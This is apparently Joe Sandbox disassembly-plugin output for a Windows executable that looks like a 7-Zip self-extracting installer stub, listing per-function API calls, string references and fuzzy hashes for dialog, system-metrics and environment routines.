                                                    • API String ID: 432778473-1797977924
                                                    • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                    • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                    • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                    • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                      • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                      • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                      • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                      • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                    • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                    • API String ID: 4038993085-372238525
                                                    • Opcode ID: 6ca09179b832223042facc11ae16c442de1ccabb0ed3d8059e6af2b2fd03001d
                                                    • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                    • Opcode Fuzzy Hash: 6ca09179b832223042facc11ae16c442de1ccabb0ed3d8059e6af2b2fd03001d
                                                    • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: wsprintf$ExitProcesslstrcat
                                                    • String ID: 0x%p
                                                    • API String ID: 2530384128-1745605757
                                                    • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                    • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                    • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                    • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                    APIs
                                                    • memset.MSVCRT ref: 00407DB6
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                    • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                    • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                      • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                      • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                    • String ID: A
                                                    • API String ID: 1557639607-3554254475
                                                    • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                    • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                    • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                    • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                    APIs
                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                      • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                      • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                    • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                    • String ID: SetEnvironment
                                                    • API String ID: 612612615-360490078
                                                    • Opcode ID: 8975c290c05f081b3aa48b512297cf9d3deb81da162b8f1c3ca5211d61be9246
                                                    • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
                                                    • Opcode Fuzzy Hash: 8975c290c05f081b3aa48b512297cf9d3deb81da162b8f1c3ca5211d61be9246
                                                    • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
                                                    APIs
                                                    • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$lstrlen
                                                    • String ID:
                                                    • API String ID: 2031685711-0
                                                    • Opcode ID: b3cd9207120c84d70b9ea52e1c46f734d4eabb935de8e223c649fd635fb9ec59
                                                    • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                    • Opcode Fuzzy Hash: b3cd9207120c84d70b9ea52e1c46f734d4eabb935de8e223c649fd635fb9ec59
                                                    • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                    APIs
                                                      • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                      • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                    • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                    • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                    • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$??3@
                                                    • String ID: 100%%
                                                    • API String ID: 2562992111-568723177
                                                    • Opcode ID: 7979a779bedf5e19285ed635ff8e0537a4e449d31975b828e080063ae18fe76e
                                                    • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                    • Opcode Fuzzy Hash: 7979a779bedf5e19285ed635ff8e0537a4e449d31975b828e080063ae18fe76e
                                                    • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                    APIs
                                                      • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                      • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                    • wsprintfW.USER32 ref: 00404F19
                                                    • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$??3@wsprintf
                                                    • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                    • API String ID: 1174869416-1550840741
                                                    • Opcode ID: 95ec4e621bfc920f5473338c82ae4d920d2910342d5ae7ea90fe2488f177eb41
                                                    • Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
                                                    • Opcode Fuzzy Hash: 95ec4e621bfc920f5473338c82ae4d920d2910342d5ae7ea90fe2488f177eb41
                                                    • Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C
                                                    APIs
                                                    • lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                    • lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                    • _wcsnicmp.MSVCRT ref: 0040423D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$_wcsnicmp
                                                    • String ID: Mg@
                                                    • API String ID: 2823567412-3680729969
                                                    • Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                    • Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
                                                    • Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                    • Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                    • API String ID: 2574300362-3900151262
                                                    • Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                    • Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
                                                    • Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                    • Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00402401
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                    • API String ID: 2574300362-736604160
                                                    • Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                    • Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
                                                    • Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                    • Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                      • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 1731127917-0
                                                    • Opcode ID: f6ac9d4c0139cef4d9b8beefe4760dccd727682243e06668031b0770e13a0576
                                                    • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                    • Opcode Fuzzy Hash: f6ac9d4c0139cef4d9b8beefe4760dccd727682243e06668031b0770e13a0576
                                                    • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8
                                                    APIs
                                                    • _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                    • ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                    • memcpy.MSVCRT(00000000,00AD9958,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                    • ??3@YAXPAX@Z.MSVCRT(00AD9958,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@ExceptionThrowmemcpy
                                                    • String ID:
                                                    • API String ID: 3462485524-0
                                                    • Opcode ID: 897b2a2a9d8dc1b2bf7e5fef47a2e08c6fc8b2b3bd591012da5b500735fb1ac7
                                                    • Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
                                                    • Opcode Fuzzy Hash: 897b2a2a9d8dc1b2bf7e5fef47a2e08c6fc8b2b3bd591012da5b500735fb1ac7
                                                    • Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8
                                                    APIs
                                                      • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
                                                    • GetDlgItem.USER32(?,000004B7), ref: 00408A97
                                                    • SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                      • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                      • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                      • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                      • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                    • String ID:
                                                    • API String ID: 3043669009-0
                                                    • Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                    • Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
                                                    • Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                    • Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
                                                    • GetSystemMetrics.USER32(00000031), ref: 004070E8
                                                    • CreateFontIndirectW.GDI32(?), ref: 004070F7
                                                    • DeleteObject.GDI32(00000000), ref: 00407126
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                    • String ID:
                                                    • API String ID: 1900162674-0
                                                    • Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                    • Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
                                                    • Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                    • Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94
                                                    APIs
                                                    • ScreenToClient.USER32(?,?), ref: 004085B0
                                                    • GetClientRect.USER32(?,?), ref: 004085C2
                                                    • PtInRect.USER32(?,?,?), ref: 004085D1
                                                      • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
                                                    • CallNextHookEx.USER32(?,?,?), ref: 004085F3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ClientRect$CallHookKillNextScreenTimer
                                                    • String ID:
                                                    • API String ID: 3015594791-0
                                                    • Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                    • Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
                                                    • Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
